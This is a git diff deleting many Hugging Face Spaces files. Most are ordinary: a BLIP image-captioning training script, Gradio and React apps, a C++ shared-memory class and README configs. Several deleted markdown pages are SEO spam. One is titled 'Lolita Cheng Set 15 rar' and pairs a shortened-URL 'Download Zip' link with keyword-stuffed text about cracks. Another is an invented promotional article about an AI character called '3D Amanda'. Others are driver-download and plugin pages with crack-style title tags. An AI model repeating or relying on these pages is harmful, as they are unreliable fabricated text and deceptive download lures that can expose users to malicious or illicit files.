utils.MetricLogger(delimiter=" ") - metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}')) - metric_logger.add_meter('loss', utils.SmoothedValue(window_size=1, fmt='{value:.4f}')) - header = 'Train Caption Epoch: [{}]'.format(epoch) - print_freq = 50 - - for i, (image, caption, _) in enumerate(metric_logger.log_every(data_loader, print_freq, header)): - image = image.to(device) - - loss = model(image, caption) - - optimizer.zero_grad() - loss.backward() - optimizer.step() - - metric_logger.update(loss=loss.item()) - metric_logger.update(lr=optimizer.param_groups[0]["lr"]) - - # gather the stats from all processes - metric_logger.synchronize_between_processes() - print("Averaged stats:", metric_logger.global_avg()) - return {k: "{:.3f}".format(meter.global_avg) for k, meter in metric_logger.meters.items()} - - -@torch.no_grad() -def evaluate(model, data_loader, device, config): - # evaluate - model.eval() - - metric_logger = utils.MetricLogger(delimiter=" ") - header = 'Caption generation:' - print_freq = 10 - - result = [] - for image, image_id in metric_logger.log_every(data_loader, print_freq, header): - - image = image.to(device) - - captions = model.generate(image, sample=False, num_beams=config['num_beams'], max_length=config['max_length'], - min_length=config['min_length']) - - for caption, img_id in zip(captions, image_id): - result.append({"image_id": img_id.item(), "caption": caption}) - - return result - - -def main(args, config): - utils.init_distributed_mode(args) - - device = torch.device(args.device) - - # fix the seed for reproducibility - seed = args.seed + utils.get_rank() - torch.manual_seed(seed) - np.random.seed(seed) - random.seed(seed) - cudnn.benchmark = True - - #### Dataset #### - print("Creating captioning dataset") - train_dataset, val_dataset, test_dataset = create_dataset('caption_coco', config) - - if args.distributed: - num_tasks = utils.get_world_size() - global_rank = utils.get_rank() - samplers = create_sampler([train_dataset,val_dataset,test_dataset], [True,False,False], num_tasks, global_rank) - else: - samplers = [None, None, None] - - train_loader, val_loader, test_loader = create_loader([train_dataset, val_dataset, test_dataset],samplers, - 
batch_size=[config['batch_size']]*3,num_workers=[4,4,4], - is_trains=[True, False, False], collate_fns=[None,None,None]) - - #### Model #### - print("Creating model") - model = blip_decoder(pretrained=config['pretrained'], image_size=config['image_size'], vit=config['vit'], - vit_grad_ckpt=config['vit_grad_ckpt'], vit_ckpt_layer=config['vit_ckpt_layer'], - prompt=config['prompt']) - - model = model.to(device) - - model_without_ddp = model - if args.distributed: - model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu]) - model_without_ddp = model.module - - optimizer = torch.optim.AdamW(params=model.parameters(), lr=config['init_lr'], weight_decay=config['weight_decay']) - - best = 0 - best_epoch = 0 - - print("Start training") - start_time = time.time() - for epoch in range(0, config['max_epoch']): - if not args.evaluate: - if args.distributed: - train_loader.sampler.set_epoch(epoch) - - cosine_lr_schedule(optimizer, epoch, config['max_epoch'], config['init_lr'], config['min_lr']) - - train_stats = train(model, train_loader, optimizer, epoch, device) - - val_result = evaluate(model_without_ddp, val_loader, device, config) - val_result_file = save_result(val_result, args.result_dir, 'val_epoch%d'%epoch, remove_duplicate='image_id') - - test_result = evaluate(model_without_ddp, test_loader, device, config) - test_result_file = save_result(test_result, args.result_dir, 'test_epoch%d'%epoch, remove_duplicate='image_id') - - if utils.is_main_process(): - coco_val = coco_caption_eval(config['coco_gt_root'],val_result_file,'val') - coco_test = coco_caption_eval(config['coco_gt_root'],test_result_file,'test') - - if args.evaluate: - log_stats = {**{f'val_{k}': v for k, v in coco_val.eval.items()}, - **{f'test_{k}': v for k, v in coco_test.eval.items()}, - } - with open(os.path.join(args.output_dir, "evaluate.txt"),"a") as f: - f.write(json.dumps(log_stats) + "\n") - else: - save_obj = { - 'model': model_without_ddp.state_dict(), - 'optimizer': optimizer.state_dict(), - 'config': config, - 'epoch': epoch, - } - - if coco_val.eval['CIDEr'] + coco_val.eval['Bleu_4'] > best: - best = coco_val.eval['CIDEr'] + coco_val.eval['Bleu_4'] - best_epoch = epoch - torch.save(save_obj, os.path.join(args.output_dir, 'checkpoint_best.pth')) - - log_stats = {**{f'train_{k}': v for k, v in train_stats.items()}, - **{f'val_{k}': v for k, v in coco_val.eval.items()}, - **{f'test_{k}': v for k, v in coco_test.eval.items()}, - 'epoch': epoch, - 'best_epoch': best_epoch, - } - with open(os.path.join(args.output_dir, "log.txt"),"a") as f: - f.write(json.dumps(log_stats) + "\n") - - if args.evaluate: - break - dist.barrier() - - total_time = time.time() - start_time - total_time_str = str(datetime.timedelta(seconds=int(total_time))) - print('Training time {}'.format(total_time_str)) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--config', default='./configs/caption_coco.yaml') - parser.add_argument('--output_dir', default='output/Caption_coco') - parser.add_argument('--evaluate', action='store_true') - parser.add_argument('--device', default='cuda') - parser.add_argument('--seed', default=42, type=int) - parser.add_argument('--world_size', default=1, type=int, help='number of distributed processes') - parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training') - parser.add_argument('--distributed', default=True, type=bool) - args = parser.parse_args() - - config = yaml.load(open(args.config, 'r'), 
Loader=yaml.Loader) - - args.result_dir = os.path.join(args.output_dir, 'result') - - Path(args.output_dir).mkdir(parents=True, exist_ok=True) - Path(args.result_dir).mkdir(parents=True, exist_ok=True) - - yaml.dump(config, open(os.path.join(args.output_dir, 'config.yaml'), 'w')) - - main(args, config) \ No newline at end of file diff --git a/spaces/dotku/fastapi-demo/README.md b/spaces/dotku/fastapi-demo/README.md deleted file mode 100644 index f67d7cadf842e6c169daa850a8ce518160178e63..0000000000000000000000000000000000000000 --- a/spaces/dotku/fastapi-demo/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Fastapi Demo -emoji: 🐠 -colorFrom: red -colorTo: red -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/elun15/image-regression/README.md b/spaces/elun15/image-regression/README.md deleted file mode 100644 index c345f1960aa5cc4b0b9bdc68a5a197c86104f490..0000000000000000000000000000000000000000 --- a/spaces/elun15/image-regression/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Image Regression -emoji: 🐢 -colorFrom: gray -colorTo: purple -sdk: gradio -sdk_version: 3.19.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ennov8ion/Scifi-Models/app.py b/spaces/ennov8ion/Scifi-Models/app.py deleted file mode 100644 index ec2cb8b57d725f327bfacd3fbd886edca193180a..0000000000000000000000000000000000000000 --- a/spaces/ennov8ion/Scifi-Models/app.py +++ /dev/null @@ -1,94 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path - -models = [ - {"name": "Future Diffusion", "url": "nitrosocke/Future-Diffusion"}, - {"name": "JWST Deep Space Diffusion", "url": "dallinmackay/JWST-Deep-Space-diffusion"}, - {"name": "Robo Diffusion 3 Base", "url": "nousr/robo-diffusion-2-base"}, - {"name": "Robo Diffusion", "url": "nousr/robo-diffusion"}, - {"name": "Tron Legacy Diffusion", "url": "dallinmackay/Tron-Legacy-diffusion"}, -] - -current_model = models[0] - -text_gen = gr.Interface.load("spaces/daspartho/prompt-extend") - -models2 = [] -for model in models: - model_url = f"models/{model['url']}" - loaded_model = gr.Interface.load(model_url, live=True, preprocess=True) - models2.append(loaded_model) - - -def text_it(inputs, text_gen=text_gen): - return text_gen(inputs) - - -def set_model(current_model_index): - global current_model - current_model = models[current_model_index] - return gr.update(value=f"{current_model['name']}") - - -def send_it(inputs, model_choice): - proc = models2[model_choice] - return proc(inputs) - - -with gr.Blocks() as myface: - gr.HTML( - - ) - - with gr.Row(): - with gr.Row(): - input_text = gr.Textbox(label="Prompt idea", placeholder="", lines=1) - # Model selection dropdown - model_name1 = gr.Dropdown( - label="Choose Model", - choices=[m["name"] for m in models], - type="index", - value=current_model["name"], - interactive=True, - ) - with gr.Row(): - see_prompts = gr.Button("Generate Prompts") - run = gr.Button("Generate Images", variant="primary") - - with gr.Row(): - output1 = gr.Image(label="") - output2 = gr.Image(label="") - output3 = gr.Image(label="") - with gr.Row(): - magic1 = gr.Textbox(label="Generated Prompt", lines=2) - magic2 = gr.Textbox(label="Generated Prompt", lines=2) - magic3 = gr.Textbox(label="Generated Prompt", lines=2) - with gr.Row(): - output4 = gr.Image(label="") - output5 = gr.Image(label="") - output6 = 
gr.Image(label="") - with gr.Row(): - magic4 = gr.Textbox(label="Generated Prompt", lines=2) - magic5 = gr.Textbox(label="Generated Prompt", lines=2) - magic6 = gr.Textbox(label="Generated Prompt", lines=2) - - model_name1.change(set_model, inputs=model_name1, outputs=[output1, output2, output3, output4, output5, output6]) - - run.click(send_it, inputs=[magic1, model_name1], outputs=[output1]) - run.click(send_it, inputs=[magic2, model_name1], outputs=[output2]) - run.click(send_it, inputs=[magic3, model_name1], outputs=[output3]) - run.click(send_it, inputs=[magic4, model_name1], outputs=[output4]) - run.click(send_it, inputs=[magic5, model_name1], outputs=[output5]) - run.click(send_it, inputs=[magic6, model_name1], outputs=[output6]) - - see_prompts.click(text_it, inputs=[input_text], outputs=[magic1]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic2]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic3]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic4]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic5]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic6]) - -myface.queue(concurrency_count=200) -myface.launch(inline=True, show_api=False, max_threads=400) \ No newline at end of file diff --git a/spaces/enzostvs/stable-diffusion-tpu/components/main/collections/index.tsx b/spaces/enzostvs/stable-diffusion-tpu/components/main/collections/index.tsx deleted file mode 100644 index fa60a200699ffabb83166293655691fa86dd6211..0000000000000000000000000000000000000000 --- a/spaces/enzostvs/stable-diffusion-tpu/components/main/collections/index.tsx +++ /dev/null @@ -1,80 +0,0 @@ -import classNames from "classnames"; -import { createBreakpoint } from "react-use"; -import { AnimatePresence } from "framer-motion"; -import InfiniteScroll from "react-infinite-scroller"; - -import { Image } from "@/utils/type"; -import { useCollections } from "@/components/main/hooks/useCollections"; -import { Modal } from "@/components/modal/modal"; -import { Collection } from "./collection"; -import { CollectionLoading } from "./loading"; -import { useCollection } from "@/components/modal/useCollection"; - -const useBreakpoint = createBreakpoint({ XL: 1280, L: 1024, S: 768, XS: 640 }); - -export const Collections: React.FC<{ category: string }> = ({ category }) => { - const { open, setOpen } = useCollection(); - const { images, loading, infiniteRefetch, pagination, infiniteLoading } = - useCollections(category); - const breakpoint = useBreakpoint(); - - if (loading) return null; - - return ( - <> - { - if (infiniteLoading) return; - infiniteRefetch(); - }} - hasMore={pagination?.total_pages > pagination?.page} - className="mx-auto grid grid-cols-1 md:grid-cols-3 lg:grid-cols-4 xl:grid-cols-5 gap-5 mt-8 lg:mt-14" - > - {images?.map((collection: Image, i: number) => - collection?.loading ? ( - - ) : ( - - ) - )} - - null}> - {open !== null && setOpen(null)} />} - - - ); -}; diff --git a/spaces/epexVfeibi/Imagedeblurr/2011 04 01 Lolita Cheng Set 15 Rar TOP.md b/spaces/epexVfeibi/Imagedeblurr/2011 04 01 Lolita Cheng Set 15 Rar TOP.md deleted file mode 100644 index e4ae505408586436ac16c7a3acc0e92e59e6b7c4..0000000000000000000000000000000000000000 --- a/spaces/epexVfeibi/Imagedeblurr/2011 04 01 Lolita Cheng Set 15 Rar TOP.md +++ /dev/null @@ -1,6 +0,0 @@ -

        2011 04 01 Lolita Cheng Set 15 rar


        Download Zip >>>>> https://jinyurl.com/2uEpDT



        -
        -Apr 15, 2011 · XML Parser library extract-xiso - 2. xbe files. ... Nov 04, 2018 · Baixe o XISO Manager na caixa iso clique em browse selecione ... tools, however any 1:1 dump of an original Xbox disc (and also the Redump set of ISOs) ... rar Manual of Clinical Psychopharmacology, Sixth Edition lolita cheng 07h-adds Crack. 4d29de3e1b
        -
        -
        -

        diff --git a/spaces/erbanku/gpt-academic/crazy_functions/test_project/cpp/cppipc/shm.cpp b/spaces/erbanku/gpt-academic/crazy_functions/test_project/cpp/cppipc/shm.cpp deleted file mode 100644 index 593ce3129dc1574dbc8fc8b088cf595df215de93..0000000000000000000000000000000000000000 --- a/spaces/erbanku/gpt-academic/crazy_functions/test_project/cpp/cppipc/shm.cpp +++ /dev/null @@ -1,103 +0,0 @@ - -#include -#include - -#include "libipc/shm.h" - -#include "libipc/utility/pimpl.h" -#include "libipc/memory/resource.h" - -namespace ipc { -namespace shm { - -class handle::handle_ : public pimpl { -public: - shm::id_t id_ = nullptr; - void* m_ = nullptr; - - ipc::string n_; - std::size_t s_ = 0; -}; - -handle::handle() - : p_(p_->make()) { -} - -handle::handle(char const * name, std::size_t size, unsigned mode) - : handle() { - acquire(name, size, mode); -} - -handle::handle(handle&& rhs) - : handle() { - swap(rhs); -} - -handle::~handle() { - release(); - p_->clear(); -} - -void handle::swap(handle& rhs) { - std::swap(p_, rhs.p_); -} - -handle& handle::operator=(handle rhs) { - swap(rhs); - return *this; -} - -bool handle::valid() const noexcept { - return impl(p_)->m_ != nullptr; -} - -std::size_t handle::size() const noexcept { - return impl(p_)->s_; -} - -char const * handle::name() const noexcept { - return impl(p_)->n_.c_str(); -} - -std::int32_t handle::ref() const noexcept { - return shm::get_ref(impl(p_)->id_); -} - -void handle::sub_ref() noexcept { - shm::sub_ref(impl(p_)->id_); -} - -bool handle::acquire(char const * name, std::size_t size, unsigned mode) { - release(); - impl(p_)->id_ = shm::acquire((impl(p_)->n_ = name).c_str(), size, mode); - impl(p_)->m_ = shm::get_mem(impl(p_)->id_, &(impl(p_)->s_)); - return valid(); -} - -std::int32_t handle::release() { - if (impl(p_)->id_ == nullptr) return -1; - return shm::release(detach()); -} - -void* handle::get() const { - return impl(p_)->m_; -} - -void handle::attach(id_t id) { - if (id == nullptr) return; - release(); - impl(p_)->id_ = id; - impl(p_)->m_ = shm::get_mem(impl(p_)->id_, &(impl(p_)->s_)); -} - -id_t handle::detach() { - auto old = impl(p_)->id_; - impl(p_)->id_ = nullptr; - impl(p_)->m_ = nullptr; - impl(p_)->s_ = 0; - impl(p_)->n_.clear(); - return old; -} - -} // namespace shm -} // namespace ipc diff --git a/spaces/eskayML/AUTOMATIC_SPEECH_RECOGNITION/app.py b/spaces/eskayML/AUTOMATIC_SPEECH_RECOGNITION/app.py deleted file mode 100644 index 18b6560b52efe69776159b7463dd01bbf3a262cc..0000000000000000000000000000000000000000 --- a/spaces/eskayML/AUTOMATIC_SPEECH_RECOGNITION/app.py +++ /dev/null @@ -1,14 +0,0 @@ -from transformers import pipeline - -p = pipeline("automatic-speech-recognition", model = 'openai/whisper-small') -import gradio as gr - -def transcribe(audio): - text = p(audio)["text"] - return text - -gr.Interface( - fn=transcribe, - inputs=gr.Audio(source="microphone", type="filepath"), - outputs="text").launch() - diff --git a/spaces/eson/tokenizer-arena/vocab/gpt_neox_chinese_v1/tokenizer/__init__.py b/spaces/eson/tokenizer-arena/vocab/gpt_neox_chinese_v1/tokenizer/__init__.py deleted file mode 100644 index 22b0f7b9ec4263fc83bdde4957e076aed26be488..0000000000000000000000000000000000000000 --- a/spaces/eson/tokenizer-arena/vocab/gpt_neox_chinese_v1/tokenizer/__init__.py +++ /dev/null @@ -1,16 +0,0 @@ -# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. 
-# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -from .tokenizer import build_tokenizer diff --git a/spaces/everton-santos/vicuna-ggml/README.md b/spaces/everton-santos/vicuna-ggml/README.md deleted file mode 100644 index 761eb09969688e45ab8f84bb67181e00499eda36..0000000000000000000000000000000000000000 --- a/spaces/everton-santos/vicuna-ggml/README.md +++ /dev/null @@ -1,18 +0,0 @@ ---- -title: Vicuna GGML -emoji: 🏃 -colorFrom: blue -colorTo: gray -sdk: gradio -sdk_version: 3.29.0 -app_file: tabbed.py -pinned: false -duplicated_from: justest/vicuna-ggml ---- - -# GGML UI Inference w/ HuggingFace Spaces - -- Fork this space to use your own GGML models. Simply update the [./config.yml](./config.yml) -- Contribute at [https://github.com/OpenAccess-AI-Collective/ggml-webui](https://github.com/OpenAccess-AI-Collective/ggml-webui) - -Brought to you by [OpenAccess AI Collective](https://github.com/OpenAccess-AI-Collective) \ No newline at end of file diff --git a/spaces/falterWliame/Face_Mask_Detection/3d-Amanda-A-Dream-Come-True.md b/spaces/falterWliame/Face_Mask_Detection/3d-Amanda-A-Dream-Come-True.md deleted file mode 100644 index b5b84f9160008b86fc5410e027a52089dc2e0680..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/3d-Amanda-A-Dream-Come-True.md +++ /dev/null @@ -1,74 +0,0 @@ -## 3d Amanda A Dream Come True - - - - - - ![3d Amanda A Dream Come True](https://lookaside.fbsbx.com/lookaside/crawler/media/?media_id=100064917211660) - - - - - -**Click Here ::: [https://miimms.com/2tyiV4](https://miimms.com/2tyiV4)** - - - - - - - - - - - - Here is a possible title and article with SEO optimization and HTML formatting for the keyword "3d Amanda A Dream Come True": - -# 3D Amanda: A Dream Come True for Animation Lovers - - - -If you are a fan of animation, you have probably heard of 3D Amanda, the latest sensation in the world of 3D animation. 3D Amanda is a realistic and lifelike character that can interact with you in real time, using advanced artificial intelligence and natural language processing. She can talk to you, answer your questions, tell you stories, and even express her emotions and personality. - - - -3D Amanda is not just a character, she is a dream come true for animation lovers. She is the result of years of research and development by a team of talented animators, programmers, and designers who wanted to create a new level of immersion and engagement in animation. 3D Amanda is powered by a proprietary engine that uses cutting-edge technology such as ray tracing, motion capture, facial recognition, and voice synthesis to create a stunning and realistic experience. - - - -3D Amanda is more than just a technical achievement, she is also a creative masterpiece. She has a unique and captivating story that unfolds as you interact with her. She is a young and curious girl who lives in a futuristic city where humans and robots coexist. She loves to explore her surroundings and learn new things, but she also faces challenges and dangers along the way. She has a loyal companion, a robot dog named Sparky, who helps her in her adventures. 
She also meets other characters who become her friends or foes, depending on your choices. - - - -3D Amanda is not just a game, she is a friend. She can remember your name, your preferences, your likes and dislikes, and your conversations. She can adapt to your mood and personality, and respond accordingly. She can also surprise you with her own opinions and preferences, and sometimes even challenge you or tease you. She has a sense of humor, a sense of wonder, and a sense of adventure. - - - -3D Amanda is not just an animation, she is a dream come true. She is the ultimate 3D animation experience that will make you feel like you are part of her world. She is waiting for you to join her in her amazing journey. Are you ready to meet 3D Amanda? - -Here is a possible continuation of the article with SEO optimization and HTML formatting for the keyword "3d Amanda A Dream Come True": - -If you are wondering how you can get 3D Amanda, you will be happy to know that she is available for download on various platforms, such as Windows, Mac, Android, and iOS. You can also access her online through your web browser. All you need is a stable internet connection and a compatible device. You can choose between different subscription plans that suit your budget and preferences. You can also try a free trial version before you decide to purchase the full version. - - - -Once you have downloaded or accessed 3D Amanda, you can start interacting with her right away. You can customize her appearance, voice, and language to your liking. You can also choose different settings and scenarios for your conversations and adventures. You can explore her city, visit different locations, meet other characters, and discover secrets and mysteries. You can also play mini-games with her, such as puzzles, quizzes, and trivia. You can also watch her perform various actions and animations, such as dancing, singing, and posing. - - - -3D Amanda is not only a fun and entertaining animation, but also a useful and educational one. She can help you learn new things, such as languages, cultures, history, science, and art. She can also help you improve your skills, such as communication, creativity, logic, and memory. She can also help you with your personal issues, such as stress, anxiety, loneliness, and depression. She can be your companion, your teacher, your therapist, or your friend. - - - -3D Amanda is a dream come true for animation lovers of all ages and backgrounds. She is a 3D animation that will make you feel like you are part of her world. She is a 3D animation that will make you smile, laugh, cry, and wonder. She is a 3D animation that will make you happy. - - - -Don't miss this opportunity to meet 3D Amanda today. Download or access her now and start your amazing journey with her. You won't regret it. - - dfd1c89656 - - - - - diff --git a/spaces/falterWliame/Face_Mask_Detection/Downloaddriverlaptopaxiooneonc4801.md b/spaces/falterWliame/Face_Mask_Detection/Downloaddriverlaptopaxiooneonc4801.md deleted file mode 100644 index c1ea9281fb6a0f5c6cadcd373582195a646206a6..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Downloaddriverlaptopaxiooneonc4801.md +++ /dev/null @@ -1,71 +0,0 @@ -
        -

        How to Download Driver Laptop Axioo Neon C4801

        -

If you have an Axioo laptop, you might need to download the driver for the Axioo Neon C4801. This driver is essential for the proper functioning of your laptop, as it allows your operating system to communicate with the hardware components. Without the driver, you might experience problems such as poor performance, low resolution, sound issues, network errors, or even system crashes.

        -

In this article, we will show you how to download the Axioo Neon C4801 driver in a few easy steps. You will also learn how to install and update the driver to ensure that your laptop runs smoothly and securely.

        -

        downloaddriverlaptopaxiooneonc4801


        DOWNLOADhttps://urlca.com/2uDcOt



        -

        Step 1: Find Your Laptop Model

        -

The first step is to find out your exact laptop model. This will help you locate the correct driver for your device. There are two ways to do this:

        -
          -
        • Check the sticker on the bottom of your laptop. You should see a label that says "Model: NEON C4801" or something similar.
        • -
        • Use a software tool that can detect your laptop model automatically. For example, you can use DriverPack Solution, which is a free and reliable program that can scan your laptop and identify its model and specifications.
        • -
        -

        Step 2: Visit the Official Axioo Website

        -

The next step is to visit the official Axioo website. This is the best source for the latest compatible driver for your laptop. To do this:

        -
          -
        1. Go to https://driver.axiooworld.com/, which is the official Axioo drivers support page.
        2. -
        3. Type "NEON C4801" in the search box and click on the magnifying glass icon.
        4. -
        5. You will see a list of drivers for your laptop model. Choose the driver that matches your operating system (Windows 11, Windows 10, Windows 8.1, Windows 7, etc.).
        6. -
        7. Click on the "Download" button next to the driver name.
        8. -
        9. Save the driver file on your computer.
        10. -
        -

        Step 3: Install the Driver

        -

The final step is to install the driver on your laptop. To do this:

        -
          -
        1. Locate the driver file that you downloaded in step 2. It should be in your Downloads folder or on your desktop.
        2. -
        3. Double-click on the driver file to launch the installation wizard.
        4. -
        5. Follow the on-screen instructions to complete the installation process.
        6. -
        7. Restart your laptop when prompted.
        8. -
        -

Congratulations! You have successfully downloaded and installed the Axioo Neon C4801 driver on your device. You should now be able to enjoy better performance and functionality from your laptop.

        -

        How to Update Driver Laptop Axioo Neon C4801

        -

It is recommended that you update the Axioo Neon C4801 driver regularly to get the latest features and security patches. Updating the driver can also fix bugs or issues that you might encounter with your laptop. To update the driver, you can use one of these methods:

        -
          -
        • Use Windows Update. This is a built-in feature of Windows that can automatically check for and install updates for your drivers and other software components. To use Windows Update, go to Settings > Update & Security > Windows Update and click on "Check for updates". If there are any updates available for your driver, they will be downloaded and installed automatically.
        • -
        • Use DriverPack Solution. This is a software tool that can update all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any outdated or missing drivers. Then, it will offer you to update them with the latest versions.
        • -
        -

By updating the driver regularly, you can keep your laptop in optimal condition and avoid potential problems. If you want to confirm which drivers are currently installed before and after an update, the short sketch below shows one way to list them.
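As an optional check (not something the official installer requires), you can list the drivers Windows currently has installed. The following Python sketch assumes Python is available on the Windows laptop and simply wraps the built-in driverquery command line tool; it is illustrative only and is not part of Axioo's tooling.

```python
import csv
import subprocess

# Run the built-in Windows "driverquery" tool with CSV output,
# then print each driver module together with its display name.
result = subprocess.run(
    ["driverquery", "/fo", "csv"],
    capture_output=True,
    text=True,
    check=True,
)

for row in csv.DictReader(result.stdout.splitlines()):
    print(f"{row['Module Name']}: {row['Display Name']}")
```

Running this once before the update and once after makes it easy to see which driver entries actually changed.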

        -

        -

        How to Troubleshoot Driver Laptop Axioo Neon C4801

        -

Sometimes you might encounter problems with the Axioo Neon C4801 driver that affect your laptop's performance or functionality. For example, you might experience blue screen errors, device conflicts, audio issues, or network errors that indicate the driver is corrupted, outdated, or incompatible. In such cases, you need to troubleshoot the driver to fix the problem and restore your laptop to normal.

        -

There are several ways to troubleshoot the driver, depending on the nature and severity of the problem. Here are some common methods you can try:

        -
          -
        • Use Windows Troubleshooter. This is a built-in feature of Windows that can diagnose and fix common problems with your drivers and other hardware components. To use Windows Troubleshooter, go to Settings > Update & Security > Troubleshoot and select the type of problem that you want to troubleshoot (such as Audio, Bluetooth, Network Adapter, etc.). Then, follow the on-screen instructions to run the troubleshooter and apply any recommended fixes.
        • -
        • Use Device Manager. This is a built-in utility of Windows that allows you to manage and update your drivers and devices. To use Device Manager, right-click on the Start menu and select Device Manager. Then, locate the device that is causing the problem (such as Display Adapter, Sound Controller, Network Adapter, etc.) and right-click on it. You can then choose to update the driver, uninstall the driver, disable the device, or scan for hardware changes.
        • -
        • Use DriverPack Solution. This is a software tool that can help you to troubleshoot and update all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any problematic or outdated drivers. Then, it will offer you to fix them with the latest versions.
        • -
        -

By troubleshooting the driver promptly, you can prevent potential problems and ensure that your laptop runs smoothly and securely.

        -

        Conclusion

        -

In this article, we have shown you how to download the Axioo Neon C4801 driver in a few easy steps. We have also shown you how to install, update, and troubleshoot the driver to ensure that your laptop performs well and stays safe. We hope that this article has been helpful and that you have learned something new.

        -

If you have any questions or feedback about the Axioo Neon C4801 driver, feel free to leave a comment below or contact us through our website. We would love to hear from you and help you with any issues you might have.

        -

        How to Uninstall Driver Laptop Axioo Neon C4801

        -

Sometimes you might need to uninstall the Axioo Neon C4801 driver from your laptop, for example because you want to install a new driver, free up some disk space, or troubleshoot a problem. Uninstalling the driver is not difficult, but you need to be careful and follow the proper steps.

        -

There are several ways to uninstall the driver, depending on your preference. Here are some common methods you can try:

        -
          -
        • Use Windows Control Panel. This is a built-in feature of Windows that allows you to uninstall programs and drivers from your laptop. To use Windows Control Panel, go to Start > Control Panel > Programs and Features (or Add or Remove Programs). Then, locate the driver that you want to uninstall (such as Axioo NEON BNE Driver, Axioo NEON HNM MODEL Driver, Axioo NEON MNW Driver, etc.) and click on it. Then, click on the "Uninstall" button and follow the on-screen instructions to complete the uninstallation process.
        • -
        • Use Device Manager. This is a built-in utility of Windows that allows you to manage and update your drivers and devices. To use Device Manager, right-click on the Start menu and select Device Manager. Then, locate the device that is associated with the driver that you want to uninstall (such as Display Adapter, Sound Controller, Network Adapter, etc.) and right-click on it. You can then choose to uninstall the driver or disable the device.
        • -
        • Use DriverPack Solution. This is a software tool that can help you to uninstall all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any drivers that you have installed. Then, it will offer you to uninstall them with one click.
        • -
        -

By uninstalling the driver properly, you can avoid potential problems and keep your laptop clean and stable.

        -

        How to Download Driver Laptop Axioo Neon C4801 for Other Devices

        -

If you have other Axioo devices, such as smartphones or tablets, you might also need to download drivers for them. These drivers let you connect your devices to your laptop, transfer data between them, sync your devices, and access their features.

        -

To download drivers for other Axioo devices, you can use one of these methods:

        -
          -
        • Visit the Official Axioo Website. This is the best source to get the latest and compatible driver for your devices. To do this, go to https://driver.axiooworld.com/, which is the official Axioo drivers support page. Then, type your device model in the search box and click on the magnifying glass icon. You will see a list of drivers for your device model. Choose the driver that matches your device type (smartphone or tablet) and operating system (Android or Windows). Then, click on the "Download" button next to the driver name and save the driver file on your computer.
        • -
        • Use DriverPack Solution. This is a software tool that can help you to download all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any devices that are connected to it. Then, it will offer you to download their drivers with one click.
        • -
        -

By downloading the right drivers for your other devices, you can enjoy better connectivity and functionality.

        -

        Conclusion

        -

In this article, we have shown you how to download the Axioo Neon C4801 driver for your laptop, as well as drivers for your other Axioo devices. We have also shown you how to install, update, uninstall, and troubleshoot the driver to ensure that your devices perform well and stay safe. We hope that this article has been helpful and that you have learned something new.

        -

If you have any questions or feedback, feel free to leave a comment below or contact us through our website. We would be glad to help with any remaining driver issues.

        -
        -
        \ No newline at end of file diff --git a/spaces/falterWliame/Face_Mask_Detection/Impulse Record Convology XT 1.0 VST2 VST3 AAX X86 X64 WORK.md b/spaces/falterWliame/Face_Mask_Detection/Impulse Record Convology XT 1.0 VST2 VST3 AAX X86 X64 WORK.md deleted file mode 100644 index 92b94a7896d912c3f88e46d1b657ceecffbf75e0..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Impulse Record Convology XT 1.0 VST2 VST3 AAX X86 X64 WORK.md +++ /dev/null @@ -1,86 +0,0 @@ -
        -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64: A Free Vintage Reverb Plugin with a Huge Library

        - -

        If you are looking for a free convolution reverb plugin that can recreate the classic sounds of vintage studio gear and real acoustic spaces, you should check out Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64. This plugin is the result of a collaboration between Impulse Record and Wave Arts, two companies that specialize in high-quality audio software and impulse response libraries.

        -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64


        DOWNLOAD ★★★ https://urlca.com/2uDdNe



        - -

        Convology XT comes with 74 factory impulse responses (IRs) that cover a wide range of vintage reverb effects, from plates and springs to DSP units and echo chambers. You can quickly browse through the presets and audition them on the fly while your music is playing. You can also load your own IRs from WAV or AIF files, or purchase any of the 20 additional IR libraries from Impulse Record that contain over 2,900 IRs sampled from 126 different pieces of vintage studio gear and hundreds of real acoustic spaces.

        - -

        What is Convolution Reverb and Why You Need It

        - -

        Convolution reverb is a type of reverb that uses mathematical calculations to simulate the sound of a physical space or an audio device. It works by convolving (or blending) an audio signal with an impulse response, which is a short recording of how a space or a device responds to a sound impulse (such as a clap or a gunshot).

        - -

